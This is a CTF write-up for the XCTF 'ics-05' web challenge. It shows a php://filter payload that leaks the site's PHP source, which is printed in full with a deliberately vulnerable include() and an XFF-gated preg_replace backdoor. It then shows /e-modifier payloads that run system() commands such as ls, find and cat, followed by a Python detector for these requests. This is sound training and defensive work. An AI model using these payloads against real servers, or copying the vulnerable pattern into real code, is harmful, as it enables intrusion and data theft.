[XCTF/Network Security] Attack and Defense World ics-05 Problem Solving Analysis
Challenge description: Attackers may break into the system through a back door in the equipment maintenance center of the industrial control cloud management system.
Following the hint, open the maintenance center page.
View the page source to locate the injection point.
Content injection
Payload: ?page={{4*5}}
If the request is page=4*5, the server receives the literal string 4*5 and no expression is evaluated. With ?page={{4*5}}, the double braces {{ }} would make a server-side template engine evaluate the expression inside them.
The response shows no echo, so this is not the way in.
PHP pseudo-protocol
Try the php:// filter wrapper. Payload:
?page=php://filter/read=convert.base64-encode/resource=index.php
The echo is as follows:
Decoding the base64 gives:
<?php
error_reporting(0);
@session_start();
posix_setuid(1000);
?>
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="stylesheet" href="layui/css/layui.css" media="all">
<title>设备维护中心</title>
<meta charset="utf-8">
</head>
<body>
<ul class="layui-nav">
<li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
</ul>
<fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
<legend>设备列表</legend>
</fieldset>
<table class="layui-hide" id="test"></table>
<script type="text/html" id="switchTpl">
<!-- the checked state here is only for demonstration -->
<input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==10003 ? 'checked' : '' }}>
</script>
<script src="layui/layui.js" charset="utf-8"></script>
<script>
layui.use('table', function() {
var table = layui.table,
form = layui.form;
table.render({
elem: '#test',
url: '/somrthing.json',
cellMinWidth: 80,
cols: [
[
{
type: 'numbers' },
{
type: 'checkbox' },
{
field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
{
field: 'name', title: '设备名', templet: '#nameTpl' },
{
field: 'area', title: '区域' },
{
field: 'status', title: '维护状态', minWidth: 120, sort: true },
{
field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
]
],
page: true
});
});
</script>
<script>
layui.use('element', function() {
var element = layui.element; // nav hover effects, sub-menus and similar features depend on the element module
//listen for nav clicks
element.on('nav(demo)', function(elem) {
//console.log(elem)
layer.msg(elem.text());
});
});
</script>
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead"><?php echo $page; die();?></p>
<br /><br /><br /><br />
<?php
}else{
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead">
<?php
if (strpos($page, 'input') > 0) {
die();
}
if (strpos($page, 'ta:text') > 0) {
die();
}
if (strpos($page, 'text') > 0) {
die();
}
if ($page === 'index.php') {
die('Ok');
}
include($page);
die();
?>
</p>
<br /><br /><br /><br />
<?php
}}
//a convenient input/output helper, still under development, for internal testers only
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
?>
</body>
</html>
Code audit
The key code is as follows:
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
// the page parameter may only contain letters and digits
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead"><?php echo $page; die();?>
<?php // if page is purely alphanumeric, it is echoed back as-is and the script exits ?>
<?php
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
// replaces every match of pattern in subject with replacement
}else{
die();
}
}
Here is a simple example of string replacement using the preg_replace() function:
<?php
// replace the spaces and commas in the string with colons
$string = "apple, banana, kiwi, orange";
$pattern = '/[\s,]+/';
$replacement = ':';
$new_string = preg_replace($pattern, $replacement, $string);
echo $new_string; // outputs "apple:banana:kiwi:orange"
?>
Method one
Capture the request and modify the XFF header
For the specific steps, see: [CTF/Network Security] Attack and Defense World xff_referer Detailed Analysis of Problem Solving
/e modifier
The /e modifier makes preg_replace() treat the replacement parameter as PHP code.
subject and pattern only need to satisfy the function's normal rules; there is no special requirement.
The payload is constructed as follows: sub is qiu, the pattern /qiu/e matches it, and the match is replaced with system('find -name *flag*'), which is then executed as PHP code:
?pat=/qiu/e&rep=system('find -name *flag*')&sub=qiu
//finds files whose names contain flag in the current directory and its subdirectories
Method two
Capture the request and modify the XFF header
List the directory
?pat=/qiu/e&rep=system('ls')&sub=qiu
The echo is as follows:
View the contents of a directory (目录 stands for the directory name)
?pat=/qiu/e&rep=system('ls+目录')&sub=qiu
The echo is as follows:
View the contents of a folder (文件夹名 stands for the folder name)
?pat=/qiu/e&rep=system('ls+目录/文件夹名')&sub=qiu
The echo is as follows:
View the content of a file (文件名 stands for the file name)
?pat=/qiu/e&rep=system('cat+目录/文件夹名/文件名')&sub=qiu
Other common payloads
List the files and subdirectories under the /var/www/html directory:
?pat=/qiu/e&rep=system('ls /var/www/html')&sub=qiu
Find files whose names contain xx in the current directory and its subdirectories, e.g. 1xx.txt or xx2023qiu.jpg:
?pat=/qiu/e&rep=system('find -name *xx*')&sub=qiu
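A defender-side detection rule for the three techniques this writeup uses (the php://filter read of index.php, the /e-modifier preg_replace payloads, and the spoofed X-Forwarded-For header), written as an added example that is not part of the original post. It scans constructed access-log lines (Apache combined format with the XFF header appended as a final field, an assumed layout) and reports which rule each request triggers.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines in Apache "combined" format with the X-Forwarded-For
# header appended as a final quoted field (invented for this example, not captured traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=index HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0" "-"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?pat=/qiu/e&rep=system('ls')&sub=qiu HTTP/1.1" 200 300 "-" "Mozilla/5.0" "127.0.0.1"
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d+ \d+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$')
# PHP functions that run a shell command or code once the replacement is evaluated.
CODE_CALL_RE = re.compile(r"\b(system|exec|passthru|shell_exec|popen|eval)\s*\(")
# A PCRE pattern whose trailing modifier list (after the closing delimiter) contains 'e'.
E_MODIFIER_RE = re.compile(r"[^\w\s\\][a-zA-Z]*e[a-zA-Z]*$")

def analyse_request(target, xff):
    """Return the list of findings for one request target and its X-Forwarded-For value."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    page = query.get("page", [""])[0]
    pat = query.get("pat", [""])[0]
    rep = query.get("rep", [""])[0]
    findings = []
    # page= should be a plain name; a php:// wrapper means source disclosure through include().
    if page.lower().startswith("php://"):
        findings.append("php-wrapper-in-page")
    # A user-controlled regex carrying /e turns the replacement into PHP code (PHP < 7).
    if pat and E_MODIFIER_RE.search(pat):
        findings.append("preg-e-modifier")
    if rep and CODE_CALL_RE.search(rep):
        findings.append("php-call-in-rep")
    # A loopback address in XFF arriving from a remote peer is a spoof attempt
    # against code that authorises on that header instead of REMOTE_ADDR.
    if xff in ("127.0.0.1", "::1"):
        findings.append("spoofed-loopback-xff")
    return findings

def scan_log(text):
    """Return (target, findings) for every log line that triggers at least one rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        findings = analyse_request(m["target"], m["xff"])
        if findings:
            hits.append((m["target"], findings))
    return hits
```

Running scan_log(SAMPLE_LOG) flags the php://filter request and the /e payload request (the latter on all three rules) while the plain page=index request passes.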
Summary
The knowledge this challenge examines: the XFF header and the /e modifier.
I'm Qiu Shuo; see you next time.